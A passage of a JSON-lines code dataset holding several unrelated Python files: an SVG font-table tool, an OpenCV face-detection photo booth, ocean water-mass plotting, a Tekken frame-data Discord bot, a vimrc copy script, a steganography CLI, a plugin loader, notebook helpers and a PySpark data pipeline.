(svgGlyphsAdded, os.path.split(fontPath)[1]), file=sys.stdout)\n\n\nreSVGelement = re.compile(r\".+?\", re.DOTALL)\nreTEXTelement = re.compile(r\".+?\", re.DOTALL)\n\ndef validateSVGfiles(svgFilePathsList):\n\t\"\"\"\n\tLight validation of SVG files.\n\t - checks that there is an element.\n\t - skips files that have a element.\n\t\"\"\"\n\tvalidatedPaths = []\n\n\tfor filePath in svgFilePathsList:\n\t\t# Skip hidden files (filenames that start with period)\n\t\tfileName = os.path.basename(filePath)\n\t\tif fileName.startswith('.'):\n\t\t\tcontinue\n\n\t\t# Skip files that don't end with SVG extension\n\t\tif not fileName.lower().endswith('.svg'):\n\t\t\tcontinue\n\n\t\tassert os.path.isfile(filePath), \"Not a valid file path: %s\" % filePath\n\t\tdata = readFile(filePath)\n\n\t\t# Find blob\n\t\tsvg = reSVGelement.search(data)\n\t\tif not svg:\n\t\t\tprint(\"WARNING: Could not find element in the file. Skiping %s\" % (filePath))\n\t\t\tcontinue\n\n\t\t# Warn about elements\n\t\ttext = reTEXTelement.search(data)\n\t\tif text:\n\t\t\tprint(\"WARNING: Found element in the file. Skiping %s\" % (filePath))\n\t\t\tcontinue\n\n\t\tvalidatedPaths.append(filePath)\n\n\treturn validatedPaths\n\n\ndef getFontFormat(fontFilePath):\n\tf = open(fontFilePath, \"rb\")\n\thead = f.read(4).decode()\n\tf.close()\n\tif head == \"OTTO\":\n\t\treturn \"OTF\"\n\telif head in (\"\\0\\1\\0\\0\", \"true\"):\n\t\treturn \"TTF\"\n\treturn None\n\n\ndef validateFontPaths(pathsList):\n\tvalidatedPathsList = []\n\tfor path in pathsList:\n\t\tpath = os.path.realpath(path)\n\t\tif os.path.isfile(path) and getFontFormat(path) in ['OTF','TTF']:\n\t\t\tvalidatedPathsList.append(path)\n\t\telse:\n\t\t\tprint(\"ERROR: %s is not a valid font file path.\" % path, file=sys.stderr)\n\treturn validatedPathsList\n\n\nclass Options(object):\n\tsvgFolderPath = None\n\tmakeFontCopy = True\n\tgenerateWOFFs = False\n\tcompressSVGs = False\n\tglyphNamesToExclude = []\n\tstripViewBox = True\n\n\tdef __init__(self, rawOptions):\n\t\tfor option, value in rawOptions:\n\t\t\tif option == \"-h\":\n\t\t\t\tprint(__doc__)\n\t\t\t\tsys.exit(0)\n\t\t\telif option == \"-m\":\n\t\t\t\tself.makeFontCopy = False\n\t\t\telif option == \"-w\":\n\t\t\t\tself.generateWOFFs = True\n\t\t\telif option == \"-z\":\n\t\t\t\tself.compressSVGs = True\n\t\t\telif option == \"-k\":\n\t\t\t\tself.stripViewBox = False\n\t\t\telif option == \"-x\":\n\t\t\t\tif value:\n\t\t\t\t\tself.glyphNamesToExclude.extend(value.split(','))\n\t\t\telif option == \"-s\":\n\t\t\t\tif value:\n\t\t\t\t\tpath = os.path.realpath(value)\n\t\t\t\t\tif os.path.isdir(path):\n\t\t\t\t\t\tself.svgFolderPath = path\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"ERROR: %s is not a valid folder path.\" % path, file=sys.stderr)\n\t\t\t\t\t\tsys.exit(1)\n\n\ndef parseOptions(args):\n\ttry:\n\t\trawOptions, files = getopt.getopt(args, \"hkms:wx:z\")\n\texcept getopt.GetoptError as err:\n\t\tprint(\"ERROR:\", err, file=sys.stderr)\n\t\tsys.exit(2)\n\n\treturn validateFontPaths(files), Options(rawOptions)\n\n\ndef run():\n\tfontPathsList, options = parseOptions(sys.argv[1:])\n\n\tif not len(fontPathsList):\n\t\tprint(\"ERROR: No valid font file path was provided.\", file=sys.stderr)\n\t\tsys.exit(1)\n\n\tif not options.svgFolderPath:\n\t\tprint(\"ERROR: Path to folder containing SVG files was not provided.\", file=sys.stderr)\n\t\tsys.exit(1)\n\telse:\n\t\tsvgFilePathsList = []\n\t\tfor dirName, subdirList, fileList in os.walk(options.svgFolderPath): # Support nested folders\n\t\t\tfor file in fileList:\n\t\t\t\tsvgFilePathsList.append(os.path.join(dirName, file))\n\n\t# Validate the SVGs\n\tsvgFilePathsList = validateSVGfiles(svgFilePathsList)\n\n\tif not svgFilePathsList:\n\t\tprint(\"No SVG files were found.\", file=sys.stdout)\n\t\tsys.exit(1)\n\n\tprocessFont(fontPathsList[0], svgFilePathsList, options)\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) == 1:\n\t\tprint(__doc__)\n\telse:\n\t\trun()\n","sub_path":"addSVGtable.py","file_name":"addSVGtable.py","file_ext":"py","file_size_in_byte":9435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"182875159","text":"'''\nBased on https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_objdetect/py_face_detection/py_face_detection.html#face-detection\n\nLook here for more cascades: https://github.com/parulnith/Face-Detection-in-Python-using-OpenCV/tree/master/data/haarcascades\n\n\nEdited by David Goedicke\n'''\n\n\nimport numpy as np\nimport cv2\nimport sys\nimport time\nimport qwiic_button\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\nimg=None\nwebCam = False\n\nbuttonR = qwiic_button.QwiicButton(0x6f)\nbuttonR.begin()\nbuttonR.LED_off()\n\nif(len(sys.argv)>1):\n try:\n print(\"I'll try to read your image\");\n img = cv2.imread(sys.argv[1])\n if img is None:\n print(\"Failed to load image file:\", sys.argv[1])\n except:\n print(\"Failed to load the image are you sure that:\", sys.argv[1],\"is a path to an image?\")\nelse:\n try:\n print(\"Trying to open the Webcam.\")\n cap = cv2.VideoCapture(0)\n if cap is None or not cap.isOpened():\n raise(\"No camera\")\n webCam = True\n except:\n img = cv2.imread(\"../data/test.jpg\")\n print(\"Using default image.\")\n\ni = 0\n\nwhile(True):\n if webCam:\n ret, img = cap.read()\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n copy = cv2.cvtColor(img, cv2.COLOR_BGR2BGRA)\n\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x,y,w,h) in faces:\n img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n cv2.putText(img, \"Want to take a photo?\",(50,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,),2,cv2.LINE_AA)\n if buttonR.is_button_pressed():\n cv2.imwrite('pic0' + str(i) + '.jpg',copy)\n i += 1\n time.sleep(0.2)\n\n if webCam:\n cv2.imshow('face-detection (press q to quit.)',img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n cap.release()\n break\n else:\n break\n\ncv2.destroyAllWindows()\n","sub_path":"Lab 5/photo-booth/face-detection.py","file_name":"face-detection.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"236488446","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUsed for plotting spatial distribution of water mass omp solutions\n\ncan also be usd for calculating global inventories\n\n\"\"\"\n\n\n\nimport iris\nimport iris.plot as iplt\nimport model_dicts as md\nimport matplotlib.pyplot as plt\nimport cartopy.crs as ccrs\nimport cmocean as cmo\nimport numpy as np\nimport numpy.ma as ma\nimport matplotlib.colors as colors\nimport omp3\n\n\n\n\n\ndef big_mean(cube):\n grid_areas = iris.analysis.cartography.area_weights(cube)\n bnds=cube.coord('depth').bounds\n lt=bnds[:,1]-bnds[:,0]\n volume_weights = lt[:, np.newaxis, np.newaxis] * grid_areas\n volume_weights=ma.masked_array(volume_weights,cube.data.mask)\n\n new_cube=cube.collapsed(['depth', 'latitude', 'longitude'],\n iris.analysis.MEAN, weights=volume_weights)\n \n return new_cube #maybe return volume weights\n\n\n#do same as that but for depth\n \n\n\ndef depth_mean(cube):\n grid_areas = iris.analysis.cartography.area_weights(cube)\n bnds=cube.coord('depth').bounds\n lt=bnds[:,1]-bnds[:,0]\n volume_weights = lt[:, np.newaxis, np.newaxis] * grid_areas\n volume_weights=ma.masked_array(volume_weights,cube.data.mask)\n\n new_cube=cube.collapsed(['depth'],\n iris.analysis.MEAN, weights=volume_weights)\n \n return new_cube,volume_weights\n \ndef plot_omp_map(cube, ptype='volume', type='contourf', levs=None, depths=None,\n extent=None):\n if depths!=None:\n depmin=(np.abs(cube.coord('depth').points -depths[0])).argmin()\n depmax=(np.abs(cube.coord('depth').points -depths[1])).argmin() \n cube,volumes=depth_mean(cube[depmin:depmax+1,:,:])\n else:\n cube,volumes=depth_mean(cube)\n cvolumes=np.sum(volumes, axis=0)\n ax = plt.axes(projection=ccrs.PlateCarree())\n if extent==None:\n ax.set_global()\n else:\n ax.set_extent(extent)\n ax.coastlines()\n \n if ptype=='volume': \n cvolumes=np.sum(volumes, axis=0)\n cube.data=cube.data*cvolumes\n elif ptype=='fraction':\n pass\n \n if levs != None:\n norm=colors.BoundaryNorm(boundaries=levs, ncolors=256)\n else:\n norm=None\n\n if type=='contourf':\n cs=iplt.contourf(cube, axes=ax, cmap=cmo.cm.deep, levels=levs,norm=norm)\n elif type=='pcolormesh':\n cs=iplt.pcolormesh(cube, axes=ax, cmap=cmo.cm.deep, norm=norm)\n\n \n plt.colorbar(cs,spacing='proportional', orientation='horizontal')\n \n return cs\n\n\n\ndef vol_sum(cube):\n cube,volumes=depth_mean(cube)\n cvolumes=np.sum(volumes, axis=0)\n cube.data=cube.data*cvolumes\n vol_sum=np.sum(cube.data)\n total_vol=np.sum(volumes)\n vol_frac=vol_sum/total_vol\n return vol_sum, vol_frac\n \n\ndef ocean_volume(cube):\n cube,volumes=depth_mean(cube)\n total_vol=np.sum(volumes)\n return total_vol\n\ndef inventory(NADW, AABW, P_IDW):\n v0,f0=vol_sum(NADW)\n v1,f1=vol_sum(AABW)\n v2,f2=vol_sum(P_IDW)\n \n tf=f0+f1+f2\n tv=v0+v1+v2 \n \n v_tot=ocean_volume(NADW)\n \n results={'NADW_volume':v0, 'NADW_fraction':f0, \n 'AABW_volume':v1, 'AABW_fraction':f1, 'I_PDW_volume':v2, \n 'I_PDW_fraction':f2, 'total_fraction':tf, 'total_volume':tv, \n 'total_ocean':v_tot, 'AABW/NADW': v1/v0}\n \n return results\n\n\nif __name__=='__main__':\n\n\n temp0=iris.load_cube(md.files['obs_temp'])\n sal0=iris.load_cube(md.files['obs_sal'])\n \n cubes2=iris.load(md.files['obs_omp_idw'])\n for cube2 in cubes2:\n if cube2.long_name=='x0':\n x0=cube2\n if cube2.long_name=='x1':\n x1=cube2\n if cube2.long_name=='x2':\n x2=cube2\n \n \n #results=inventory(x0,x1,x2)\n #print [(key,value) for (key, value) in sorted(results.items())]\n \n levs=[0,0.001,0.025,0.05,0.075,0.1,0.15,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1]\n \n depths=[700,1200]\n \n plot_omp_map(x0,ptype='fraction',type='pcolormesh', levs=levs, depths=depths)\n plt.title('NADW')\n plt.show()\n \n plot_omp_map(x2,ptype='fraction',type='pcolormesh', levs=levs, depths=depths)\n plt.title('IDW')\n plt.show()\n \n \n #print [(key,value) for (key, value) in sorted(results.items())]\n \n","sub_path":"omp_map_plots.py","file_name":"omp_map_plots.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"432134865","text":"#!/usr/bin/env python3\nimport os, sys\nimport datetime\nimport logging\nimport discord\nfrom discord.ext import commands\n\nimport tkfinder\n\nprefix = '§'\ndescription = 'The premier Tekken 7 Frame bot, made by Baikonur#4927'\nbot = commands.Bot(command_prefix=prefix, description=description)\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.WARNING)\nfile_handler = logging.FileHandler('log/logfile.log')\n\nformatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(message)s')\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n# Dict for searching special move types\nmove_types = {'ra': 'Rage art',\n 'rage_art': 'Rage art',\n 'rd': 'Rage drive',\n 'rage_drive': 'Rage drive',\n 'wb': 'Wall bounce',\n 'wall_bounce': 'Wall bounce',\n 'ts': 'Tail spin',\n 'tail_spin': 'Tail spin',\n 'screw': 'Tail spin',\n 'homing': 'Homing',\n 'homari': 'Homing',\n 'armor': 'Power crush',\n 'armori': 'Power crush',\n 'pc': 'Power crush',\n 'power': 'Power crush',\n 'power_crush': 'Power crush'}\n\n# Get token from local txt file\ndirname, pyfilename = os.path.split(os.path.abspath(sys.argv[0]))\ntfilename = os.path.join(dirname, 'token.txt')\n\nwith open(tfilename) as token_file:\n token = token_file.read().strip()\n\n\ndef move_embed(character, move):\n '''Returns the embed message for character and move'''\n embed = discord.Embed(title=character['proper_name'],\n colour=0x00EAFF,\n url=character['online_webpage'],\n description='**Move: ' + move['Command'] + '**')\n\n embed.set_thumbnail(url=character['portrait'])\n embed.add_field(name='Property', value=move['Hit level'])\n embed.add_field(name='Damage', value=move['Damage'])\n embed.add_field(name='Startup', value='i' + move['Start up frame'])\n embed.add_field(name='Block', value=move['Block frame'])\n embed.add_field(name='Hit', value=move['Hit frame'])\n embed.add_field(name='Counter Hit', value=move['Counter hit frame'])\n embed.add_field(name='Notes', value=(move['Notes'] if move['Notes'] else \"-\"))\n if move['Gif']:\n embed.add_field(name='Gif', value=move['Gif'], inline=False)\n\n return embed\n\n\ndef move_list_embed(character, move_list, move_type):\n '''Returns the embed message for a list of moves matching to a special move type'''\n desc_string = ''\n for move in move_list:\n desc_string += move + '\\n'\n\n embed = discord.Embed(title=character['proper_name'] + ' ' + move_type.lower() + ':',\n colour=0x00EAFF,\n description=desc_string)\n\n return embed\n\n\ndef error_embed(err):\n embed = discord.Embed(title='Error',\n colour=0xFF4500,\n description=err)\n\n return embed\n\n\ndef similar_moves_embed(similar_moves):\n embed = discord.Embed(title='Move not found', colour=0xfcba03,\n description='Similar moves:\\n**{}**'\n .format('** **\\n'.join(similar_moves)))\n return embed\n\n\n@bot.event\nasync def on_ready():\n print(datetime.datetime.utcnow().isoformat())\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n\n\n@bot.command()\nasync def test(ctx):\n print('Testing...')\n embed = discord.Embed(title='Test title', description='A test embed thing.', colour=0x0000FF)\n embed.set_author(name='Test name', icon_url=bot.user.default_avatar_url)\n await ctx.send(embed=embed, delete_after=60)\n\n\n@bot.event\nasync def on_message(message):\n '''This has the main functionality of the bot. It has a lot of\n things that would be better suited elsewhere but I don't know\n if I'm going to change it.\n '''\n\n try:\n channel = message.channel\n\n if message.content == '?help':\n msg = await channel.send(embed=help_embed())\n\n if message.content == '!delete-data':\n deleted = await channel.purge(limit=200, check=is_me)\n return\n\n if message.content.startswith('!'):\n\n delete_after = 13\n if ('tekken' in channel.name) or ('frame' in channel.name):\n delete_after = None\n\n user_message = message.content\n user_message = user_message.replace('!', '')\n user_message_list = user_message.split(' ', 1)\n\n if len(user_message_list) <= 1:\n # malformed command\n return\n\n chara_name = user_message_list[0].lower()\n chara_move = user_message_list[1]\n if chara_name == 'armor' or chara_name == 'ak':\n chara_name = 'armor_king'\n elif chara_name == 'dj' or chara_name == 'dvj' or chara_name == 'djin' or chara_name == 'devil' or chara_name == 'deviljin' or chara_name == 'diablojim' or chara_name == 'taika-jim':\n chara_name = 'devil_jin'\n elif chara_name == 'sergei' or chara_name == 'drag' or chara_name == 'dragu':\n chara_name = 'dragunov'\n elif chara_name == 'goose':\n chara_name = 'geese'\n elif chara_name == 'hwo' or chara_name == 'hwoa':\n chara_name = 'hwoarang'\n elif chara_name == 'jack' or chara_name == 'jack-7' or chara_name == \"jaska\":\n chara_name = 'jack7'\n elif chara_name == 'julle':\n chara_name = 'julia'\n elif chara_name == 'chloe' or chara_name == 'lc' or chara_name == 'lucky':\n chara_name = 'lucky_chloe'\n elif chara_name == 'hei' or chara_name == 'hessu' or chara_name == 'heiska':\n chara_name = 'heihachi'\n elif chara_name == 'kata' or chara_name == 'kat':\n chara_name = 'katarina'\n elif chara_name == 'kaz' or chara_name == 'kazze':\n chara_name = 'kazuya'\n elif chara_name == 'karhu' or chara_name == 'panda':\n chara_name = 'kuma'\n elif chara_name == 'mara':\n chara_name = 'marduk'\n elif chara_name == 'master' or chara_name == 'raven' or chara_name == 'mraven' or chara_name == 'masterraven':\n chara_name = 'master_raven'\n elif chara_name == 'nocto':\n chara_name = 'noctis'\n elif chara_name == 'pave':\n chara_name = 'paul'\n elif chara_name == 'sha':\n chara_name = 'shaheen'\n elif chara_name == 'yoshi':\n chara_name = 'yoshimitsu'\n elif chara_name == 'ling':\n chara_name = 'xiaoyu'\n elif chara_name == \"zaffy\" or chara_name == 'zaf':\n chara_name = 'zafina'\n\n character = tkfinder.get_character(chara_name)\n if character is not None:\n if chara_move.lower() in move_types:\n chara_move = chara_move.lower()\n move_list = tkfinder.get_by_move_type(character, move_types[chara_move])\n if len(move_list) < 1:\n embed = error_embed('No ' + move_types[chara_move].lower() + ' for ' + character['proper_name'])\n msg = await channel.send(embed=embed, delete_after=delete_after)\n elif len(move_list) == 1:\n move = tkfinder.get_move(character, move_list[0], False)\n embed = move_embed(character, move)\n msg = await channel.send(embed=embed, delete_after=delete_after)\n elif len(move_list) > 1:\n embed = move_list_embed(character, move_list, move_types[chara_move])\n msg = await channel.send(embed=embed, delete_after=delete_after)\n\n else:\n move = tkfinder.get_move(character, chara_move, True)\n\n # First checks the move as case sensitive, if it doesn't find it\n # it checks it case unsensitive\n\n if move is not None:\n embed = move_embed(character, move)\n msg = await channel.send(embed=embed, delete_after=delete_after)\n else:\n move = tkfinder.get_move(character, chara_move, False)\n if move is not None:\n embed = move_embed(character, move)\n msg = await channel.send(embed=embed, delete_after=delete_after)\n else:\n similar_moves = tkfinder.get_similar_moves(chara_move, chara_name)\n embed = similar_moves_embed(similar_moves)\n msg = await channel.send(embed=embed, delete_after=delete_after)\n else:\n bot_msg = 'Character ' + chara_name + ' does not exist.'\n embed = error_embed(bot_msg)\n msg = await message.channel.send(embed=embed, delete_after=5)\n return\n await bot.process_commands(message)\n except Exception as e:\n print(e)\n logger.error(e)\n\n\ndef help_embed():\n text = \"```\" \\\n \"!character move - get frame data of a move from a character \\n\" \\\n \"!delete-data - deletes bot's last own messages\\n\" \\\n \"\\n\" \\\n \"The bot automatically deletes it's own messages after 10 seconds except in channel with the 'tekken' or 'frame' in it```\\n\\n\" \\\n \"Much thanks and love to T7Chicken Team, BKNR, Dreamotion, Jacket, Cangu and Vesper. \\n\\n\" \\\n \"This project won't be possible without you guys <3\"\n embed = discord.Embed(title='Commands', description=text, colour=0x37ba25)\n embed.set_author(name='Author: Tib')\n\n return embed\n\n\ndef is_me(m):\n return m.author == bot.user\n\n\nbot.run(token)\n","sub_path":"mokujin.py","file_name":"mokujin.py","file_ext":"py","file_size_in_byte":10024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"548624933","text":"from os.path import expanduser, isfile\nfrom os import getcwd, rename\nfrom shutil import copyfile\nimport sys\n\ndef copy():\n print( \"Creating a backup vimrc at \" + backup )\n rename( vimrc, backup )\n print( \"Copying from \" + path + \" to \" + vimrc )\n copyfile( path, vimrc )\n\nif sys.version_info[0] < 3:\n raise Exception(\"Must be using Python 3!\")\n\npath = expanduser( \"~\" ) + \"/.vimrc\"\nvimrc = getcwd() + \"/vimrc/.vimrc\"\nbackup = vimrc + \".bak\"\n\nif isfile( path ):\n copy()\nelse:\n print( path + \"couldn't be found!\" )\n\n","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"593224507","text":"import argparse\nimport os\nfrom image_steganography import ImageSteganography\nfrom audio_steganography import AudioSteganography\nfrom termcolor import cprint \n\n'''\nParser of command line arguments\n'''\ndef args_parser():\n #Parser of command line arguments\n parser = argparse.ArgumentParser()\n \n #Initialization of needed arguments\n parser.add_argument(\"-encode\", \"-e\", dest=\"encode_check\", help=\"Encode the message in the file\", action='store_true')\n parser.add_argument(\"-input\", \"-i\", dest=\"input\", help=\"Input file path of the image (PNG) or the audio (WAV) to be encrypted or decrypted\")\n parser.add_argument(\"-output\", \"-o\", dest=\"output\", help=\"Output file path of the image (PNG) or the audio (WAV) with secret message\")\n parser.add_argument(\"-message\", \"-msg\", dest=\"msg\", help=\"Message to be encrypted\")\n\n #Parse command line arguments\n args = parser.parse_args()\n \n #Check if the arguments have been specified on command line\n if (not args.input) or (not os.path.exists(args.input)) or \\\n (args.encode_check and not args.output):\n parser.print_help()\n exit(0)\n \n return args.encode_check, args.input, args.output, args.msg\n\ndef main():\n is_encode, input_path, output_path, secret_msg = args_parser()\n st = None\n\n if input_path[-4:] == '.png':\n st = ImageSteganography(input_path)\n elif input_path[-4:] == '.wav':\n st = AudioSteganography(input_path)\n else:\n cprint('\\nFile type not supported', 'red', end='\\n\\n')\n exit(0)\n\n if is_encode:\n if not secret_msg:\n cprint('\\nWrite the message to be hidden:', 'blue')\n cprint('_________________________________', 'blue')\n secret_msg = input()\n cprint('_________________________________', 'blue', end='\\n\\n')\n \n st.encode(secret_msg, output_path)\n else:\n cprint('\\nHidden message:', 'blue')\n cprint('_________________________________', 'blue')\n st.decode()\n cprint('_________________________________', 'blue', end='\\n\\n')\n\nif __name__=='__main__':\n main()","sub_path":"Steganography/src/steganography.py","file_name":"steganography.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"190736360","text":"# Copyright 2019 Nokia\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport inspect\nimport hw_detector.hw_type as hwbase_type\n\ndef _import_classes(module_name, module_type):\n classes = []\n try:\n __import__(module_name)\n except ImportError as e:\n print(\"Failed import in {0} skipping {1}\".format(module_name, e))\n return None\n module = sys.modules[module_name]\n for obj_name in dir(module):\n # Skip objects that are meant to be private.\n if obj_name.startswith('_'):\n continue\n elif obj_name == module_type.__name__:\n continue\n itm = getattr(module, obj_name)\n if inspect.isclass(itm) and issubclass(itm, module_type):\n classes.append(itm)\n return classes\n\ndef get_libs(directory, module_type):\n classes = []\n if directory not in sys.path:\n sys.path.append(directory)\n\n for fname in os.listdir(directory):\n root, ext = os.path.splitext(fname)\n if ext != '.py' or root == '__init__':\n continue\n module_name = \"%s\" % (root)\n for iclass in _import_classes(module_name, module_type):\n classes.append(iclass())\n return classes\n\ntypes = get_libs('%s/hw_types' % os.path.dirname(hwbase_type.__file__), hwbase_type.HWType)\n","sub_path":"src/hw_detector/hw_types/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"360143840","text":"from IPython.core.display import display, HTML, Markdown\nfrom IPython.display import YouTubeVideo\n\ndef show_link(url, title='Authorize'):\n display(HTML(f'Click {title} or open {url} in your browser'))\n\ndef video(id):\n return YouTubeVideo(id, width=700, height=400)\n\ndef walk(item, level=0, path=[]):\n path_str = \" > \".join(map(str, path))\n if isinstance(item, dict):\n print(f\"[dict {path_str}\")\n for key, val in item.items():\n walk(val, level+1, [*path, key])\n elif isinstance(item, list):\n print(f\"[list {path_str}\")\n for i, val in enumerate(item):\n walk(val, level+1, [*path, i])\n else:\n print(f'| {path_str}={str(item)}')\n\n\ndef print_rows(recods, limit=None):\n \"\"\"\n print_rows(['a', 'b'], [{'a':1, 'b':2}])\n \"\"\"\n cols = {c for record in recods for c in record.keys()}\n txt = '|'.join(cols)+'\\n'\n txt += '|'.join(['---' for i in range(len(cols))])+'\\n'\n for i, row in enumerate(recods):\n txt += '|'.join([str(row.get(f)).replace('|', '|') for f in cols])+'\\n'\n if limit and limit <= i:\n break\n display(Markdown(txt))\n\n","sub_path":"rodin_helpers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"389974528","text":"\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pyspark.sql.functions as func\nfrom pyspark.sql import Row\nimport pandas as pd\nfrom pyspark.sql.window import Window\nfrom random import randint,seed\nfrom pyspark.sql.functions import col, expr, when, lower, collect_set,collect_list, abs\nfrom pyspark.sql.functions import concat, col, lit, regexp_replace,udf,concat_ws,rand,randn\nfrom pyspark.sql.types import DoubleType,IntegerType, ArrayType\nimport os\n\nABS_PATH=os.path.abspath(os.path.dirname(__file__))\n#from ds_filter_raw_data import DSFilterData\n\nclass DS:\n\tdef __init__(self \\\n\t\t, spark \\\n\t\t, database_name = \"34np_project_celebrus_ku\" \\\n\t\t, visitor_name = \"hd_wt_visitor\" \\\n\t\t, ewwh_ebank_agree_h_name = \"34np_gard_ewwh_ebank_agree_h\" \\\n\t\t, abt_db_p_name = \"demoss_gendab_abt_sync_abt_db_p\"\n\t\t, click_name = \"hd_wt_click\" \\\n\t\t, column_name = \"target\" \\\n\t\t, nr_rows = 20000):\n\n\t\tself.spark = spark\n\t\tself.visitor_table = spark.table(database_name + \".\" + visitor_name)\n\t\tself.ewwh_ebank_agree_h_table = spark.table(database_name + \".\" + ewwh_ebank_agree_h_name)\n\t\tself.click_table = spark.table(database_name + \".\" + click_name)\n\t\tself.abt_db_p_table = spark.table(database_name + \".\" + abt_db_p_name)\n\t\tself.n = nr_rows\n\n\t\tself.visitor_table = self.spark.table(database_name + \".\" + visitor_name)\n\t\tself.ewwh_ebank_agree_h_table = self.spark.table(database_name + \".\" + ewwh_ebank_agree_h_name)\n\t\tself.abt_db_p_table = self.spark.table(database_name + \".\" + abt_db_p_name)\n\n\tdef run(self):\n\t\traw_data_pipe = DSTest(self.spark)\n\t\traw_data_df = raw_data_pipe.run()\n\n\t\treturn raw_data_df\n\t\t#filtered_data_pipe = DSRawDataExtraction(self.spark \\\n\t\t#, raw_data_df)\n\nclass DSTest:\n\tdef __init__(self \\\n\t\t, spark_session \\\n\t\t, database_name = \"34np_project_celebrus_ku\" \\\n\t\t, visitor_name = \"hd_wt_visitor\" \\\n\t\t, ewwh_ebank_agree_h_name = \"34np_gard_ewwh_ebank_agree_h\" \\\n\t\t, abt_db_p_name = \"demoss_gendab_abt_sync_abt_db_p\"):\n\t\tself.spark = spark_session\n\t\tself.visitor_table = self.spark.table(database_name + \".\" + visitor_name)\n\t\tself.ewwh_ebank_agree_h_table = self.spark.table(database_name + \".\" + ewwh_ebank_agree_h_name)\n\t\tself.abt_db_p_table = self.spark.table(database_name + \".\" + abt_db_p_name)\n\n\tdef run(self):\n\t\tfinal_targets = self.raw_data_filtered()\n\t\treturn final_targets\n\n\tdef raw_data_filtered(self):\n\t\t\"\"\"\n\t\tJoins ewwh, abt, and visitor, while filtering out duplicates and\n\t\tsorting by date.\n\t\t\"\"\"\n\n\t\t# ewwh_ebank_agree_h_table contains [knid, ebanking-agreement, ..]\n\t\t# As there are multiple rows with identical aft_hav_ip_id(knid), choose the first.\n\t\t# NOTE: groupBy is order-preserving relative to functions (eg. first)\n\t\tdistinct_knid_ebank_agree = self.ewwh_ebank_agree_h_table \\\n\t\t\t.select(self.ewwh_ebank_agree_h_table.aft_hav_ip_id.substr(1, 10).alias('knid') \\\n\t\t\t\t, self.ewwh_ebank_agree_h_table.aftlnr) \\\n\t\t\t.distinct()\n\n\t\t\"\"\"\n\t\t\t.orderBy(self.ewwh_ebank_agree_h_table.aft_hav_ip_id \\\n\t\t\t\t\t, self.ewwh_ebank_agree_h_table.mtts) \\\n\t\t\t.groupBy(self.ewwh_ebank_agree_h_table.aft_hav_ip_id.substr(1, 10).alias(\"knid\")) \\\n\t\t\t.agg(func.first(self.ewwh_ebank_agree_h_table.aftlnr).alias(\"aftlnr\"))\n\t\t\"\"\"\n\t\t#print(\"dis\", distinct_knid_ebank_agree.count())\n\t\t#print(\"dis\",distinct_knid_ebank_agree.count())\n\n\t\t# self.abt_db_p_table contains [knid, age, ..]\n\t\tknid_age_unique = self.abt_db_p_table \\\n\t\t\t.groupBy(self.abt_db_p_table.knid) \\\n\t\t\t.agg(func.max(self.abt_db_p_table.customer_age).alias(\"customer_age\"))\n\t\t#print(\"knid_age_unique\", knid_age_unique.count())\n\t\t#print(\"knid_age_unique\", knid_age_unique.count())\n\n\t\t# Join the two tables. knid_agree_age = [knid, age, ebanking-agreement]\n\t\tknid_agree_age = knid_age_unique \\\n\t\t\t.join(distinct_knid_ebank_agree \\\n\t\t\t\t, distinct_knid_ebank_agree.knid == knid_age_unique.knid \\\n\t\t\t\t, \"inner\") \\\n\t\t\t.select(knid_age_unique.knid \\\n\t\t\t\t, distinct_knid_ebank_agree.aftlnr \\\n\t\t\t\t, knid_age_unique.customer_age)\n\t\t#print(\"knid agree\", knid_agree_age.count())\n\t\t#print(\"knid agree\",knid_agree_age.count())\n\n\t\t# Joined with the visitor table. \n\n\t\tfinal_targets = knid_agree_age.join(self.visitor_table \\\n\t\t\t\t\t\t\t\t\t\t\t, self.visitor_table.profileuiid == knid_agree_age.aftlnr \\\n\t\t\t\t\t\t\t\t\t\t\t, \"left_semi\")\n\t\t#print(\"final\",final_targets.count())\n\t\t#print(\"final\",final_targets.count())\n\n\t\tvisitor_table_unique_target = self.visitor_table 